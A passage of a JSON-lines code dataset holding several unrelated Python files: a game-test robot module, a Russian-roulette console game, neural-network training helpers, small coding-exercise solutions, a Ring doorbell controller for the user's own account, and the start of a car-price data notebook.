gem:\n\t\t\tlogging.error(\"gem is too little. gem num : %s \" % have_gem)\n\t\t\treturn Response()\n\t\telse:\n\t\t\treturn self.__request.player_name_change(item_id=item_id, name=name, gem=gem)\n\t\n\tdef player_avatar_change(self) -> Response:\n\t\titem_id = 216\n\t\tif str(item_id) in self.__data.svr_bag.item_list.keys():\n\t\t\tcost_type = 0\n\t\t\tgem_num = 0\n\t\telse:\n\t\t\tcost_type = 1\n\t\t\titem_id = -1\n\t\t\tgem_num = game_table.get_item(item_id=item_id).item_price\n\t\tavatar_id = random.randint(0, 5)\n\t\treturn self.__request.player_avatar_change(avatar_id, cost_type, gem_num, item_id)\n\t\n\tdef add_lord_point(self, item_id=1671) -> Response:\n\t\titems = [1670, 1671]\n\t\thas_item = False\n\t\tfor item in items:\n\t\t\tif str(item) in self.__data.svr_bag.item_list.keys():\n\t\t\t\titem_id = item\n\t\t\t\thas_item = True\n\t\t\t\tbreak\n\t\tprice = game_table.get_item(item_id=item_id).item_price\n\t\tif has_item:\n\t\t\treturn self.__request.item_use(item_id, self.__uid, action_type=-1, rally_war_id=0, is_attack=0)\n\t\telse:\n\t\t\treturn self.__request.item_buy_and_use(item_id, self.__uid, price, action_type=-1, rally_id=0, is_attack=0)\n\t\n\tdef reset_skill(self) -> Response:\n\t\titem_id = 350\n\t\tif str(item_id) in self.__data.svr_bag.item_list.keys():\n\t\t\tcost_type = 0\n\t\telse:\n\t\t\tcost_type = 1\n\t\tprice = game_table.get_item(item_id=item_id).item_price\n\t\treturn self.__request.lord_skill_reset(cost_type=cost_type, gem_num=price, item_id=item_id)\n\t\n\tdef add_all_resource(self, resource_num: int = 1000000) -> Response:\n\t\tif resource_num <= 1000000:\n\t\t\treturn self.__request.op_self_add_clear_resource(resource_num=resource_num)\n\t\telse:\n\t\t\tresult = None\n\t\t\tfor resource_id in range(0, 5):\n\t\t\t\tresult = self.__request.op_self_set_resource(rss_id=resource_id, rss_num=resource_num)\n\t\t\t\tif result.is_right_ret_code:\n\t\t\t\t\tcontinue\n\t\t\t\telse:\n\t\t\t\t\tbreak\n\t\t\treturn result\n\t\n\tdef use_buff_item(self, item_id: int):\n\t\tif str(item_id) not in self.__data.svr_bag.item_list.keys():\n\t\t\tlogging.error(\"No this item\".title())\n\t\t\treturn False\n\t\treturn self.__request.item_use(item_id=item_id, target_id=-1, action_type=-1, rally_war_id=0, is_attack=0)\n\t\n\tdef set_all_build_level(self, level: int):\n\t\town_builds = self.__data.svr_building.building\n\t\tfor build_pos, build_info in own_builds.items():\n\t\t\tbuild_pos = int(build_pos)\n\t\t\tif build_pos == 2 or build_pos == 33 or build_pos == 3:\n\t\t\t\tcontinue\n\t\t\tif build_info[-1] >= level:\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tif not self.__request.op_self_set_pos_building_lv(build_pos, level).is_right_ret_code:\n\t\t\t\t\tbreak\n\t\n\tdef mail_send(self, player_name):\n\t\t\n\t\tmail_type = 0\n\t\t\n\t\timport util\n\t\timport random\n\t\tchat_path = util.get_ini_data(conf_path, section=\"path\", section_item=\"chat_path\")\n\t\tchat_data = util.read_json_file(file_path=chat_path)\n\t\t\n\t\tdata_key = str(random.randint(0, len(chat_data) - 1))\n\t\tcontent = chat_data[data_key]\n\t\t\n\t\treturn self.__request.mail_send(mail_type=mail_type, target_name=player_name, content=content)\n","sub_path":"tools/okc_robot/module/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":3758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"119361833","text":"from random import*\r\n\r\ndeath = False\r\nend = False\r\nnumberEss = 0\r\n\r\nprint(\"avec combien de balles voulez-vous jouer?\")\r\nprint(\"max = 6, min = 0\")\r\nball = int(input())\r\nwhile ball > 6 or ball < 0:\r\n print(\"valeur impossible, essayez une autre\")\r\n ball = int(input())\r\n\r\nwhile not death and not end:\r\n print(\"voulez vous tourner le tambour?\")\r\n print(\"oui/non\")\r\n answer = input()\r\n if answer == \"oui\":\r\n numberEss += 1\r\n if ball != 0:\r\n shotStop = randrange(6)\r\n if (ball-1) >= shotStop:\r\n print(\"C'etait votre dernier essai\")\r\n death = True\r\n else:\r\n print(\"vous avez de la chance, vous êtes encore vivant\")\r\n else:\r\n print(\"vous ne pouvez pas perdre, pourquoi vous voulez jouer?\")\r\n else:\r\n print(\"voulez vous arrêter de jouer?\")\r\n print(\"oui/non\")\r\n answer = input()\r\n if answer == \"oui\":\r\n end = True\r\n\r\nif death:\r\n print(\"vous êtes mort après\", numberEss, \"essais\")\r\nelse:\r\n print(\"vous etes toujours vivant. Vous avez survécu\", numberEss, \"essais\")\r\n","sub_path":"Russian roulette.py","file_name":"Russian roulette.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"535262532","text":"import numpy as np\nimport torch as th\nimport os\nimport time\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nfrom multiprocessing import Pool\nimport configuration as cfg\n\n# ONLY DEV\nimport sys\n\n\ndef sprint(obj, obj_name=\"Object\", complete=False, exit=False):\n print(\"Printing out\", obj_name)\n print(type(obj))\n\n if (isinstance(obj, th.Tensor)):\n obj = obj.cpu().detach().numpy()\n\n if (isinstance(obj, np.ndarray)):\n print(obj.shape)\n\n if (complete):\n print(obj)\n\n if(exit):\n sys.exit()\n \ndef set_up_batch(_iter, data_filenames):\n \"\"\"\n In this function, a batch is composed to be fed into the network.\n :param _iter: The iteration of the current epoch\n :param data_filenames: The paths to the data files\n :return: Two lists: one with network inputs, and another one with\n corresponding labels\n \"\"\"\n\n # Determine which inputs of the 16x16 default input field are the center for\n # this pk_rows and pk_cols set up\n data_xmin = int(8 - np.floor(cfg.PK_COLS / 2.))\n data_xmax = int(8 + np.ceil(cfg.PK_COLS / 2.))\n data_ymin = int(8 - np.floor(cfg.PK_ROWS / 2.))\n data_ymax = int(8 + np.ceil(cfg.PK_ROWS / 2.))\n\n # Get width and height of the visual field of the network\n width, height = data_xmax - data_xmin, data_ymax - data_ymin\n\n # Load data from file\n # TOASK Why +1 ?\n # Probably because of the shift in the input and output array\n data = np.load(data_filenames[_iter])[:cfg.SEQ_LEN + 1]\n\n # data.shape = (cfg.SEQ_LEN +1 , 2, 16, 16)\n\n # for sample in range(len(data_filenames)):\n\n # \n\n # print(\"\\nsample:\",sample)\n\n\n # for item in range(40):\n # for i in range(width):\n # for j in range(height):\n # cur = data[item,:,i,j]\n # if(not np.isclose(cur[1],0.0)):\n # print(\"=== Sample:\", sample, \", Sequenz:\", item,\" ===\")\n # print(f\"[{i}|{j}]: {cur}\")\n \n\n # Generate a random position for the visual field\n x = np.random.randint(0, max(1, 15 - width))\n y = np.random.randint(0, max(1, 15 - height))\n\n # Sub select only the data values that are of interest\n data = data[:, :, x:x + width, y:y + height]\n\n # Get first and second dimension of data\n dim0, dim1 = np.shape(data)[:2]\n\n # # In case the desired field is larger than 16x16 pixels (which is the data\n # # dimension), pad the data with zeros\n # if cfg.PK_ROWS >= 16 or cfg.PK_COLS >= 16:\n # data = np.pad(\n # array=data,\n # pad_width=((0, 0),\n # (0, 0),\n # (0, cfg.PK_ROWS - 16),\n # (0, cfg.PK_COLS - 16)),\n # mode=\"constant\",\n # constant_values=0\n # )\n\n # Reshape the data array to have the kernels on one dimension\n data = np.reshape(data, [dim0, dim1, cfg.PK_ROWS * cfg.PK_COLS])\n # data.shape = (41, 2, 256)\n \n\n # Swap the second and third dimension of the data\n data = np.swapaxes(data, axis1=1, axis2=2)\n # shape = (41, 256, 2)\n\n # Split the data into inputs (where some noise is added) and labels\n # Add noise to all timesteps except very last one\n _net_input = np.array(\n data[:-1] + np.random.normal(0, cfg.DATA_NOISE, np.shape(data[:-1])),\n dtype=np.float32\n )\n # shape: (40, 256, 2)\n\n # noise = cfg.DATA_NOISE\n # _net_input = np.array(\n # data[:-1] + np.random.uniform(-noise, noise, np.shape(data[:-1])),\n # dtype=np.float32\n # )\n _net_label = np.array(data[1:, :, 0:1], dtype=np.float32)\n # shape: (40, 256, 1)\n \n\n if cfg.TRAINING:\n # Set the dynamic inputs with a certain probability to zero to force\n # the network to use lateral connections\n _net_input *= np.array(\n np.random.binomial(n=1, p=1 - cfg.P_ZERO_INPUT,\n size=_net_input.shape),\n dtype=np.float32\n )\n\n return _net_input, _net_label\n\n\ndef evaluate(net, data_filenames, params, tensors, pk_batches, criterion=None,\n optimizer=None, _iter=0, testing=False):\n \"\"\"\n This function evaluates the network for given data and optimizes the weights\n if an optimizer is provided.\n :param net: The network\n :param data_filenames: The filenames where the data to forward are lying\n :param params: The parameters of the network\n :param tensors: The tensors of the network\n :param pk_batches: The number of batches for the PKs\n :param criterion: The criterion to measure the error\n :param optimizer: The optimizer to optimize the weights\n :param _iter: The current iteration of e.g. the training\n :param testing: Bool that determines weather network is being tested\n :return: The error, net inputs, net labels and net outputs\n \"\"\"\n\n seq_len = cfg.SEQ_LEN if not testing\\\n else cfg.TEACHER_FORCING_STEPS + cfg.CLOSED_LOOP_STEPS\n\n # Generate the training data batch for this iteration\n net_input, net_label = set_up_batch(\n _iter=_iter,\n data_filenames=data_filenames\n )\n\n # Set up an array of zeros to store the network outputs\n net_outputs = th.zeros(size=(seq_len,\n pk_batches,\n params.pk_dyn_out_size))\n\n if optimizer:\n # Set the gradients back to zero\n optimizer.zero_grad()\n\n # Reset the network to clear the previous sequence\n net.reset(pk_num=pk_batches)\n\n # Iterate over the whole sequence of the training example and perform a\n # forward pass\n for t in range(seq_len):\n\n # Prepare the network input for this sequence step\n if testing and t > cfg.TEACHER_FORCING_STEPS:\n #\n # Closed loop - receiving the output of the last time step as\n # input\n dyn_net_in_step = net_outputs[t - 1].detach().numpy()\n else:\n #\n # Teacher forcing\n\n # Set the dynamic input for this iteration\n dyn_net_in_step = net_input[t, :, :params.pk_dyn_out_size]\n\n # Forward the input through the network\n net.forward(dyn_in=dyn_net_in_step)\n\n # Store the output of the network for this sequence step\n net_outputs[t] = tensors.pk_dyn_out\n\n mse = None\n\n if criterion:\n # Get the mean squared error from the evaluation list\n mse = criterion(net_outputs, th.from_numpy(net_label))\n # Alternatively, the mse can be calculated 'manually'\n # mse = th.mean(th.pow(net_outputs - th.from_numpy(net_label), 2))\n\n if optimizer:\n mse.backward()\n optimizer.step()\n\n return mse, net_input, net_label, net_outputs\n\n\ndef determine_device():\n \"\"\"\n This function evaluates whether a GPU is accessible at the system and\n returns it as device to calculate on, otherwise it returns the CPU.\n :return: The device where tensor calculations shall be made on\n \"\"\"\n device = th.device(\"cuda\" if th.cuda.is_available() else \"cpu\")\n print(\"Using device:\", device)\n print()\n\n # Additional Info when using cuda\n if device.type == \"cuda\":\n print(th.cuda.get_device_name(0))\n print(\"Memory Usage:\")\n print(\"\\tAllocated:\",\n round(th.cuda.memory_allocated(0) / 1024 ** 3, 1), \"GB\")\n print(\"\\tCached: \", round(th.cuda.memory_cached(0) / 1024 ** 3, 1),\n \"GB\")\n print()\n return device\n\n\ndef save_model_to_file(model_src_path, cfg_file, epoch, epoch_errors_train,\n epoch_errors_val, net):\n \"\"\"\n This function writes the model weights along with the network configuration\n and current performance to file.\n :param model_src_path: The source path where the model will be saved to\n :param cfg_file: The configuration file\n :param epoch: The current epoch\n :param epoch_errors_train: The training epoch errors\n :param epoch_errors_val: The validation epoch errors,\n :param net: The actual model\n :return: Nothing\n \"\"\"\n # print(\"\\nSaving model (that is the network's weights) to file...\")\n\n _model_save_path = model_src_path + \"/\" + cfg.MODEL_NAME + \"/\"\n if not os.path.exists(_model_save_path):\n os.makedirs(_model_save_path)\n\n # Save model weights to file\n th.save(net.state_dict(), _model_save_path + cfg.MODEL_NAME + \".pt\")\n\n output_string = cfg_file + \"\\n#\\n# Performance\\n\\n\"\n\n output_string += \"CURRENT_EPOCH = \" + str(epoch) + \"\\n\"\n output_string += \"EPOCHS = \" + str(cfg.EPOCHS) + \"\\n\"\n output_string += \"CURRENT_TRAINING_ERROR = \" + \\\n str(epoch_errors_train[-1]) + \"\\n\"\n output_string += \"LOWEST_TRAINING_ERROR = \" + \\\n str(min(epoch_errors_train)) + \"\\n\"\n output_string += \"CURRENT_VALIDATION_ERROR = \" + \\\n str(epoch_errors_val[-1]) + \"\\n\"\n output_string += \"LOWEST_VALIDATION_ERROR = \" + \\\n str(min(epoch_errors_val))\n\n # Save the configuration and current performance to file\n with open(_model_save_path + 'cfg_and_performance.txt', 'w') as _text_file:\n _text_file.write(output_string)\n\n\ndef plot_kernel_activity(ax, label, net_out, net_in=None, make_legend=False):\n \"\"\"\n This function displays the wave activity of a single kernel.\n :param ax: The plot where the activity shall be displayed in\n :param label: The label for the wave (ground truth)\n :param net_out: The network output\n :param net_in: The network input\n :param make_legend: Boolean that indicates weather a legend shall be created\n \"\"\"\n\n central_kernel = (cfg.PK_ROWS * cfg.PK_COLS) // 2\n central_kernel = 20\n\n if net_in is not None:\n ax.plot(range(len(net_in)), net_in[:, central_kernel, 0],\n label='Network input', color='green')\n ax.plot(range(len(label)), label[:, central_kernel, 0],\n label='Target', color='deepskyblue')\n ax.plot(range(len(net_out)), net_out[:, central_kernel, 0],\n label='Network output', color='red', linestyle='dashed')\n # if net_in is None:\n yticks = ax.get_yticks()[1:-1]\n ax.plot(np.ones(len(yticks)) * cfg.TEACHER_FORCING_STEPS, yticks,\n color='white', linestyle='dotted',\n label='End of teacher forcing')\n if make_legend:\n ax.legend()\n\n\ndef animate_2d_wave(net_label, net_outputs, net_inputs=None):\n \"\"\"\n This function visualizes the spatio-temporally expanding wave\n :param net_label: The corresponding labels\n :param net_outputs: The network output\n :param net_inputs: The network inputs\n :return: The animated plot of the 2d wave\n \"\"\"\n\n num_axes = 2\n\n # Bring the data into a format that can be displayed as heatmap\n data = np.reshape(net_outputs, [len(net_outputs),\n cfg.PK_ROWS,\n cfg.PK_COLS,\n len(net_outputs[0, 0])])\n net_label = np.reshape(net_label, [len(net_label),\n cfg.PK_ROWS,\n cfg.PK_COLS,\n len(net_label[0, 0])])\n\n if net_inputs is not None:\n net_inputs = np.reshape(net_inputs, [len(net_inputs),\n cfg.PK_ROWS,\n cfg.PK_COLS,\n len(net_inputs[0, 0])])\n num_axes = 3\n\n # Define a grid size that shall be visualized\n gs1 = 0\n gs2 = cfg.PK_ROWS\n\n # First set up the figure, the axis, and the plot element we want to\n # animate\n fig, axes = plt.subplots(1, num_axes, figsize=[6*num_axes, 6], dpi=100)\n im1 = axes[0].imshow(net_label[0, gs1:gs2, gs1:gs2, 0], vmin=-0.8, vmax=0.8,\n cmap='Blues')\n\n # Visualize the obstacle if there is one\n txt1 = axes[0].text(0, axes[0].get_yticks()[0], 't = 0', fontsize=20,\n color='white')\n axes[0].set_title(\"Network Output\")\n\n # In the subfigure on the right hand side, visualize the true data\n im2 = axes[1].imshow(net_label[0, gs1:gs2, gs1:gs2, 0], vmin=-0.8, vmax=0.8,\n cmap='Blues')\n axes[1].set_title(\"Ground Truth\")\n\n im3 = None\n if net_inputs is not None:\n im3 = axes[2].imshow(net_inputs[0, gs1:gs2, gs1:gs2, 0], vmin=-0.8,\n vmax=0.8, cmap=\"Blues\")\n axes[2].set_title(\"Network Input\")\n\n anim = animation.FuncAnimation(fig, animate, frames=len(data),\n fargs=(cfg.TEACHER_FORCING_STEPS, data, im1,\n im2, im3, txt1, gs1, gs2, net_label,\n net_inputs),\n interval=1)\n\n return anim\n\n\ndef animate(_i, _teacher_forcing_steps, _data, _im1, _im2, _im3, _txt1, _gs1,\n _gs2, _net_label, _net_inputs):\n\n # Pause the simulation briefly when switching from teacher forcing to\n # closed loop prediction\n if _i == _teacher_forcing_steps:\n time.sleep(1.0)\n elif _i < 150:\n time.sleep(0.05)\n\n # Set the pixel values of the image to the data of timestep _i\n _im1.set_array(_data[_i, _gs1:_gs2, _gs1:_gs2, 0])\n if _i < len(_net_label) - 1:\n _im2.set_array(_net_label[_i, _gs1:_gs2, _gs1:_gs2, 0])\n if _im3 is not None:\n _im3.set_array(_net_inputs[_i, _gs1:_gs2, _gs1:_gs2, 0])\n\n # Display the current timestep in text form in the plot\n if _i < _teacher_forcing_steps:\n _txt1.set_text('Teacher forcing, t = ' + str(_i))\n else:\n _txt1.set_text('Closed loop prediction, t = ' + str(_i))\n\n return _im1, _im2, _im3\n","sub_path":"code_archive/model/distana/helper_functions.py","file_name":"helper_functions.py","file_ext":"py","file_size_in_byte":13819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"605560395","text":"#CheckIO Solution to Friends\n\n\n\n'''\nReturns a new Friends instance. \"connections\" is an iterable of sets with two elements in each. \nEach connection contains two names as strings. Connections can be repeated in the initial data, \nbut inside it's stored once. Each connection has only two states - existing or not.\n'''\nclass Friends:\n\n def __init__(self, connections):\n \n self.connections = list(connections)\n \n #Add a connection in the instance. \"connection\" is a set of two names (strings). Returns True if this connection is new. Returns False if this connection exists already.\n def add(self, connection):\n \n if connection in self.connections:\n return False\n \n else:\n self.connections.append(connection)\n return True\n \n #Remove a connection from the instance. \"connection\" is a set of two names (strings). Returns True if this connection exists. Returns False if this connection is not in the instance.\n def remove(self, connection):\n \n if connection in self.connections:\n self.connections.remove(connection)\n return True\n \n else:\n return False\n \n #Returns a set of names. The set contains only names which are connected with somebody.\n def names(self):\n \n nameset = set()\n \n for s in self.connections:\n for n in s:\n if n not in nameset:\n nameset.add(n)\n \n return nameset\n \n #Returns a set of names which is connected with the given \"name\". If \"name\" does not exist in the instance, then return an empty set. \n def connected(self, name):\n \n namelist = []\n nset = set()\n [namelist.extend(list(w)) for w in self.connections if name in w]\n nset = set(namelist)\n if name in set(namelist):\n nset.remove(name)\n \n return nset","sub_path":"Friends.py","file_name":"Friends.py","file_ext":"py","file_size_in_byte":2014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"285812727","text":"#/usr/bin/env python\n\n# Author: Wei Tong \n#\n\nclass Solution:\n # @param prices, a list of integer\n # @return an integer\n def maxProfit(self, prices):\n if len(prices) <= 1:\n return 0\n \n delta = []\n for i in range(1, len(prices)):\n delta.append(prices[i] - prices[i-1])\n \n mpos, msum = 0, 0\n for d in delta:\n if mpos <= 0:\n mpos = d\n else:\n mpos += d\n \n if mpos > msum:\n msum = mpos\n return msum\n \n","sub_path":"Best Time to Buy and Sell Stock.py","file_name":"Best Time to Buy and Sell Stock.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"598283814","text":"#Author: Rami Janini\r\n#Version: 1.3: Fixing issues and adding light control.\r\nimport time\r\nfrom getpass import getpass\r\nfrom ring_doorbell import Ring\r\n\r\n\r\nprint('''\r\n\t ___ ___ _\r\n\t / _ \\__ __/ _ \\(_)__ ___ _\r\n\t/ ___/ // / , _/ / _ \\/ _ `/\r\n\t/_/ \\_, /_/|_/_/_//_/\\_, /\r\n\t\t/___/ /___/\r\n\t\t\tAuthor:Rami Janini\r\n\t\t\t\t\t v.1.3\r\n''')\r\n\r\nringEmail = input('Ring Email: ')\r\nringPassword = getpass('Ring Password: ')\r\n\r\nring = Ring(ringEmail, ringPassword)\r\n\r\nringCameras = ring.stickup_cams\r\nringDoorbells = ring.doorbells\r\n\r\n\r\ndef CameraCheck():\r\n\tfor dev in list(ringCameras + ringDoorbells):\r\n\r\n\t\tdev.update()\r\n\r\n\t\tprint('Account ID: %s' % dev.account_id)\r\n\t\tprint('Device Type: %s' % dev.family)\r\n\t\tprint('Address: %s' % dev.address)\r\n\t\tprint('Family: %s' % dev.family)\r\n\t\tprint('ID: %s' % dev.id)\r\n\t\tprint('Name: %s' % dev.name)\r\n\t\tprint('Timezone: %s' % dev.timezone)\r\n\t\tprint('Wifi Name: %s' % dev.wifi_name)\r\n\t\tprint('Wifi RSSI: %s' % dev.wifi_signal_strength)\r\n\t\tprint('Battery Life: %s' % dev.battery_life)\r\n\r\n\r\ndef GetVideo():\r\n\tdef stickCamVideo():\r\n\t\tstickupCamera = ringCameras[0]\r\n\t\tstickupCamera.recording_download(\r\n\t\t\tstickupCamera.history(limit=100, kind='motion')[0],\r\n\t\t\t\t\t\t\t\t\tfilename='last_motion.mp4', override=True)\r\n\r\n\tdef doorbellCamVideo():\r\n\t\tdoorbell = ringCameras[0]\r\n\t\tdoorbell.recording_download(\r\n\t\t\tdoorbell.history(limit=100, kind='motion')[0],\r\n\t\t\t\t\t\t\t\t\tfilename='last_motion.mp4', override=True)\r\n\r\n\twhile True:\r\n\t\tcamFootageDevice = input('Select: 1--> Security Camera Footage 2--> Doorbell Camera Footage 3--> Go Back : ')\r\n\t\tif camFootageDevice == '1':\r\n\t\t\tprint(\"\")\r\n\t\t\tstickCamVideo()\r\n\t\t\tprint(\"\")\r\n\t\telif camFootageDevice == '2':\r\n\t\t\tprint(\"\")\r\n\t\t\tdoorbellCamVideo()\r\n\t\t\tprint(\"\")\r\n\t\telif camFootageDevice == '3':\r\n\t\t\tbreak\r\n\t\telse:\r\n\t\t\tcontinue\r\n\r\ndef GetMotionAlerts():\r\n\r\n\tdef stickCamMotion():\r\n\t\tfor stickup_cams in ringCameras:\r\n\t\t\t#You can change the limit\r\n\t\t\tfor event in stickup_cams.history(limit=10):\r\n\t\t\t\tprint('Footage ID: %s' % event['id'])\r\n\t\t\t\tprint('Kind: %s' % event['kind'])\r\n\t\t\t\tprint('Answered: %s' % event['answered'])\r\n\t\t\t\tprint('Date/Time: %s' % event['created_at'])\r\n\t\t\t\tprint('--' * 50)\r\n\t\t\tevents = stickup_cams.history(kind ='motion')\r\n\r\n\tdef doorbellCamMotion():\r\n\t\tfor doorbell in ringDoorbells:\r\n\t\t\t#You can change the limit\r\n\t\t\tfor event in doorbell.history(limit=10):\r\n\t\t\t\tprint('Footage ID: %s' % event['id'])\r\n\t\t\t\tprint('Kind: %s' % event['kind'])\r\n\t\t\t\tprint('Answered: %s' % event['answered'])\r\n\t\t\t\tprint('Date/Time: %s' % event['created_at'])\r\n\t\t\t\tprint('--' * 50)\r\n\t\t\tevents = doorbell.history(kind ='motion')\r\n\twhile True:\r\n\t\tcamMotionDevice = input('Select: 1--> Security Camera Motion Alerts 2--> Doorbell Camera Motion Alerts 3--> Go Back : ')\r\n\t\tif camMotionDevice == '1':\r\n\t\t\tprint(\"\")\r\n\t\t\tstickCamMotion()\r\n\t\t\tprint(\"\")\r\n\t\telif camMotionDevice == '2':\r\n\t\t\tprint(\"\")\r\n\t\t\tdoorbellCamMotion()\r\n\t\t\tprint(\"\")\r\n\t\telif camMotionDevice == '3':\r\n\t\t\tbreak\r\n\t\telse:\r\n\t\t\tcontinue\r\n\r\ndef sirenController():\r\n\tdef stickCamSiren():\r\n\t\tfor dev in list(ringCameras):\r\n\r\n\t\t\tseconds = input('After how many seconds do you want the alarm to be turned off? ')\r\n\t\t\tseconds=int(seconds)\r\n\t\t\tprint(\"Activating alarm for \" + str(seconds) + \" seconds...\")\r\n\t\t\tdev.siren = 60\r\n\t\t\ttime.sleep(seconds)\r\n\t\t\tdev.siren = 0\r\n\r\n\tdef doorbellSiren():\r\n\t\tfor dev in list(ringDoorbells):\r\n\r\n\t\t\tseconds = input('After how many seconds do you want the alarm to be turned off? ')\r\n\t\t\tseconds=int(seconds)\r\n\t\t\tprint(\"Activating alarm for \" + str(seconds) + \" seconds...\")\r\n\t\t\tdev.siren = 60\r\n\t\t\ttime.sleep(seconds)\r\n\t\t\tdev.siren = 0\r\n\r\n\twhile True:\r\n\t\tcamSiren = input('Select: 1--> Turn Security Camera Siren On 2--> Turn Doorbell Siren On 3--> Go Back : ')\r\n\t\tif camSiren == '1':\r\n\t\t\tprint(\"\")\r\n\t\t\tstickCamSiren()\r\n\t\t\tprint(\"\")\r\n\t\telif camSiren == '2':\r\n\t\t\tprint(\"\")\r\n\t\t\tdoorbellSiren()\r\n\t\t\tprint(\"\")\r\n\t\telif camSiren == '3':\r\n\t\t\tbreak\r\n\t\telse:\r\n\t\t\tcontinue\r\n\r\ndef lightControl():\r\n\tdef lightOn():\r\n\t\tfor dev in list(ringCameras + ringDoorbells):\r\n\r\n\t\t\tdev.update()\r\n\r\n\t\t\tif dev.family == 'stickup_cams' and dev.lights:\r\n\t\t\t\tdev.lights = 'on'\r\n\r\n\t\t\tprint('Lights On!')\r\n\r\n\tdef lightOff():\r\n\t\tfor dev in list(ringCameras + ringDoorbells):\r\n\r\n\t\t\tif dev.family == 'stickup_cams' and dev.lights:\r\n\t\t\t\tdev.lights = 'off'\r\n\t\t\tprint('Lights Off!')\r\n\r\n\r\n\twhile True:\r\n\t\tlightControlAnswer = input('Select: 1--> Turn Lights On 2--> TurnLights Off 3--> Go Back : ')\r\n\t\tif lightControlAnswer == '1':\r\n\t\t\tprint(\"\")\r\n\t\t\tlightOn()\r\n\t\t\tprint(\"\")\r\n\t\telif lightControlAnswer == '2':\r\n\t\t\tprint(\"\")\r\n\t\t\tlightOff()\r\n\t\t\tprint(\"\")\r\n\t\telif lightControlAnswer == '3':\r\n\t\t\tbreak\r\n\t\telse:\r\n\t\t\tcontinue\r\n\r\ndef startProgram():\r\n\tprint('Logged in as: ', ringEmail)\r\n\tprint(\"\")\r\n\tprint('Your Devices List:')\r\n\tprint(ringCameras)\r\n\tprint(\"\")\r\n\twhile True:\r\n\t\tanswer = input('Select: 1--> Cameras Check 2--> Motion Footage 3--> Motion Alerts 4--> Siren Controller 5--> Light Controller 6--> Exit :')\r\n\r\n\t\tif answer == '1':\r\n\t\t\tprint(\"\")\r\n\t\t\tCameraCheck()\r\n\t\t\tprint(\"\")\r\n\r\n\t\telif answer == '2':\r\n\t\t\tprint(\"\")\r\n\t\t\tGetVideo()\r\n\t\t\tprint(\"\")\r\n\t\telif answer == '3':\r\n\t\t\tprint(\"\")\r\n\t\t\tGetMotionAlerts()\r\n\t\t\tprint(\"\")\r\n\t\telif answer == '4':\r\n\t\t\tprint(\"\")\r\n\t\t\tsirenController()\r\n\t\t\tprint(\"Alarm is off!\")\r\n\t\t\tprint(\"\")\r\n\t\telif answer == '5':\r\n\t\t\tprint(\"\")\r\n\t\t\tlightControl()\r\n\t\t\tprint(\"\")\r\n\t\telif answer == '6':\r\n\t\t\tprint(\"\")\r\n\t\t\tprint(\"Thanks For using PyRing!\")\r\n\t\t\tbreak\r\n\t\telse:\r\n\t\t\tprint(\"\")\r\n\t\t\tprint(\"Invaild input, please choose again!\")\r\n\t\t\tprint(\"\")\r\n\t\t\tcontinue\r\n\r\nstartProgram()\r\n","sub_path":"PyRing.py","file_name":"PyRing.py","file_ext":"py","file_size_in_byte":5586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"440945058","text":"# To add a new cell, type '# %%'\n# To add a new markdown cell, type '# %% [markdown]'\n# %%\nfrom IPython import get_ipython\n\n# %% [markdown]\n# ### 载入包\n\n# %%\n#coding:utf-8\n#导入warnings包,利用过滤器来实现忽略警告语句。\nimport warnings\nwarnings.filterwarnings('ignore')\n\nimport pandas as pd \nimport numpy as np \n\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom operator import itemgetter\n\nget_ipython().run_line_magic('matplotlib', 'inline')\n\n# %% [markdown]\n# ### 载入数据\n\n# %%\npath = 'D:/OneDrive/文档/DeepLearning/secondHandCarPrediction/data/'\n\nTrain_data = pd.read_csv(path + 'train.csv', sep = ' ')\nTest_data = pd.read_csv(path + 'testA.csv', sep = ' ')\nprint('Train data shape:', Train_data.shape)\nprint('TestA data shape:', Test_data.shape)\n\n\n# %%\n# 观察数据,首位各5条记录\nTrain_data.head().append(Train_data.tail())\n\n\n# %%\nTest_data.head().append(Test_data.tail())\n\n# %% [markdown]\n# ### 搞点描述统计\n\n# %%\nTrain_data.info()\n\n\n# %%\nTest_data.info()\n\n# %% [markdown]\n# `notRepairedDamage`变量的类型是object,看看里面是什么臭鱼烂虾\n\n# %%\nTrain_data['notRepairedDamage'].value_counts()\n\n\n# %%\n## “-”不做处理,替换成nan\n# inplace参数默认False,不修改原dataframe的数据\n\nTrain_data['notRepairedDamage'].replace('-', np.nan, inplace = True)\nTest_data['notRepairedDamage'].replace('-', np.nan, inplace = True)\n\n# 把object转化为数值\nTrain_data['notRepairedDamage'] = pd.to_numeric(Train_data['notRepairedDamage'])\nTest_data['notRepairedDamage'] = pd.to_numeric(Test_data['notRepairedDamage'])\n\n\n# %%\nTrain_data['notRepairedDamage'].value_counts()\n\n\n# %%\nTest_data['notRepairedDamage'].value_counts()\n\n# %% [markdown]\n# 搞定`notRepairedDamage`再看一眼\n\n# %%\nTrain_data.info()\n\n\n# %%\n# 标准化\nTrain_data_std = (Train_data - Train_data.mean()) / Train_data.std()\n\n\n# %%\nTrain_data_std.plot.box()\n\n# %% [markdown]\n# 这个`seller`和`offerType`很奇怪的亚子\n\n# %%\nTrain_data[\"seller\"].plot.density()\n\n\n# %%\nsum(Train_data[\"offerType\"])\n\n\n# %%\ndel Train_data[\"seller\"]\ndel Train_data[\"offerType\"]\ndel Test_data[\"seller\"]\ndel Test_data[\"offerType\"]\n\n\n# %%\nTrain_data_std = (Train_data - Train_data.mean()) / Train_data.std()\nTrain_data_std.plot.box()\n\n\n# %%\nTrain_data.columns\n\n# %% [markdown]\n# ### 处理异常值\n\n# %%\ndef outliers_proc(data, col_name, scale=3):\n \"\"\"\n 用于清洗异常值,默认用 box_plot(scale=3)进行清洗\n :param data: 接收 pandas 数据格式\n :param col_name: pandas 列名\n :param scale: 尺度\n :return:\n \"\"\"\n\n def box_plot_outliers(data_ser, 